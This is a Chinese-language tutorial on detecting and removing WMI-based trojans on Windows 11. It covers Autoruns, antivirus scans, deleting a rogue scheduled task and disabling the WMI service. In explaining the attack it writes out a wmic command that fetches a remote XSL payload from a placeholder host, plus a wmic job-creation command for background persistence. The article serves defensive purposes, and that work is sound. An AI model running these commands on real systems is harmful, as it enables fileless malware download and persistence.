怎么徹查Win11的WMI木馬
WMI是一個windows11系統(tǒng)中非常核心的功能,我們可以通過運用這個功能來實現(xiàn)腳本部署、進(jìn)程枚舉、監(jiān)控目錄修改等常見的操作,但是總有一些不懷好意的人對此進(jìn)行木馬病毒的植入,一旦WMI被植入木馬病毒,由于其特殊性,會對我們的系統(tǒng)造成非常嚴(yán)重的損傷,那么該如何解決這個問題呢?感興趣的小伙伴們可以往下看看。
1. 了解WMI惡意軟件的運行機制
如上所述,WMI具備的功能非常豐富,對于黑客來說只要利用其中的命令就可以完成很多操作。比如獲得相應(yīng)的權(quán)限后,在目標(biāo)電腦上使用“wmic os get /FORMAT:"http://www.xxxx.com:80/123.xsl"”命令就可以實現(xiàn)從網(wǎng)站服務(wù)器上下載所需的惡意軟件123.xsl(圖1)。
當(dāng)然在實際運行中,這些惡意軟件還可以利用WMI進(jìn)行更多的操作,如使用“wmic job call create "123.exe",0,0,true,false,********154800.000000+480”命令創(chuàng)建一個在后臺運行的任務(wù)計劃,甚至可以執(zhí)行創(chuàng)建系統(tǒng)服務(wù)、將DLL文件注入系統(tǒng)進(jìn)程等操作。因為這里使用的都是系統(tǒng)命令(wmic.exe),并不像常規(guī)的木馬、病毒那樣由本體執(zhí)行,所以稱之為“無文件”(嚴(yán)格來說是WMI腳本運行,腳本被觸發(fā)后執(zhí)行下載木馬等操作)方式運行。比如臭名昭著的“KingMiner挖礦木馬”,它通過WMI事件訂閱來不斷地觸發(fā)木馬在后臺運行。
●火速鏈接:
本刊2018年6期文章《解決WMI進(jìn)程資源占用的問題》介紹了WMI的相關(guān)知識。
2. 發(fā)現(xiàn)和識別WMI惡意軟件
WMI木馬的一個重要特性就是借助WMI腳本來下載或者激活木馬運行。比如某WMI挖礦木馬感染電腦后會在系統(tǒng)里生成一個任務(wù)計劃,任務(wù)會在后臺連接到服務(wù)器下載挖礦木馬。挖礦木馬運行后會占用系統(tǒng)大量的資源和帶寬,導(dǎo)致Windows在日常使用時運行緩慢,網(wǎng)頁打開速度也變得很慢,且電腦的硬盤指示燈一直在閃爍(因為木馬會在后臺不斷地讀取數(shù)據(jù))。如果自己的電腦在使用時有上述的異?,F(xiàn)象,那么就需要使用安全軟件檢查是否中了木馬。
Windows 10用戶可以先使用系統(tǒng)自帶的“安全中心”進(jìn)行查殺,如果無法解決問題則可以借助一些木馬專殺軟件,如火絨惡性木馬專殺工具(https://bbs.huorong.cn/thread-18575-1-1.html)進(jìn)行查殺,啟動軟件后點擊“立即掃描”,常見的木馬(包括WMI木馬)一般都可以被自動查殺(圖2)。
不過,如果中了WMI木馬,安全軟件只會將WMI腳本下載的木馬文件刪除,但是無法完全斬斷WMI木馬文件的下載途徑,如上述介紹的WMI挖礦木馬就是利用任務(wù)計劃進(jìn)行下載。因為任務(wù)計劃中并沒有惡意軟件,安全軟件是不會將其刪除的,所以通過專殺軟件刪除木馬后,每次重啟系統(tǒng)掃描后還是一直提示發(fā)現(xiàn)木馬文件,那么就極可能中了WMI木馬,這時就還需要對系統(tǒng)的啟動項進(jìn)行檢查,查看是否有異常的啟動項。
系統(tǒng)啟動項檢查可以借助Autoruns來完成(https://docs.microsoft.com/zh-cn/sysinternals/downloads/autoruns),啟動程序后它會自動對本機所有的啟動項目進(jìn)行檢測,包括計劃任務(wù)、服務(wù)、WMI等(圖3)。
比如筆者公司的一臺電腦在執(zhí)行安全掃描時就發(fā)現(xiàn)木馬文件無法徹底刪除的現(xiàn)象,在本機運行Autoruns后切換到“計劃任務(wù)”,在打開的窗口中就可以看到后臺所有的任務(wù)計劃。對于沒有數(shù)字簽名的任務(wù),程序會使用淺紅色進(jìn)行標(biāo)注,可以看到本機中一個名為“l(fā)smosee”的任務(wù)極為可疑,它加載的是本機臨時目錄中的一個VBS文件(圖4)。
在上圖選中“l(fā)smosee”并右擊,選擇“跳轉(zhuǎn)到文件夾”,在打開的文件夾中根據(jù)圖上“鏡像路徑”的提示,使用記事本打開“54236.vbs”文件,其中顯示的正是一些WMI腳本的內(nèi)容,它的作用就是在后臺定時下載木馬文件?,F(xiàn)在按提示將其刪除。接著返回上圖,選中“l(fā)smosee”任務(wù)并點擊“刪除”,這樣就可以切斷木馬的下載通道。最后使用火絨安全軟件再掃描一遍電腦,刪除其他帶毒的文件后,問題得到順利的解決(圖5)。
3. 一勞永逸封禁WMI木馬下載
WMI木馬難以查殺的原因就是由于它的下載方式是通過WMI腳本實現(xiàn),而且WMI腳本激活的方法很多(如上例為任務(wù)計劃,有些則是使用進(jìn)程注入等),不過WMI腳本的運行要依賴“WMI Performance Adapter”服務(wù),因此對于個人用戶來說,可以通過停用服務(wù)的方法來禁止WMI腳本的運行。在桌面的任務(wù)欄搜索框中輸入“服務(wù)”,打開服務(wù)管理組件后找到上述服務(wù),雙擊打開后將其停止,并將其啟動類型設(shè)置為“禁用”,這樣本機所有的WMI腳本就無法運行了(圖6)。
注意:
禁用WMI服務(wù)可能會導(dǎo)致一些網(wǎng)絡(luò)服務(wù)無法使用。禁用服務(wù)如果影響電腦使用,請及時進(jìn)行恢復(fù)。
上文就是小編為您帶來的Win11 WMI木馬查殺方法了,若還有疑問請多多關(guān)注好吧啦網(wǎng)手機教程頻道!
相關(guān)文章:
1. Win8設(shè)置同時顯示多個時區(qū)時間技巧2. centos7使用docker部署gitlab-ce-zh應(yīng)用詳解3. Win11 USB接口不能用怎么辦? Win11電腦USB接口沒反應(yīng)的解決辦法4. 統(tǒng)信UOS系統(tǒng)怎么關(guān)閉? uos關(guān)機的多種方法5. 統(tǒng)信UOS家庭版開始內(nèi)測 無需分區(qū)全自動安裝6. 在vmware虛擬機中安裝Linux系統(tǒng)CentOS7詳細(xì)教程7. deepin20桌面圖標(biāo)樣式怎么修改? deepin更換圖標(biāo)主題的技巧8. CentOS 6.6系統(tǒng)怎么安裝?CentOS Linux系統(tǒng)安裝配置圖解教程9. 銀河麒麟操作系統(tǒng)(KyLin)常用問題及解決方法10. CentOS7中無法找到pci find device函數(shù)的解決方法
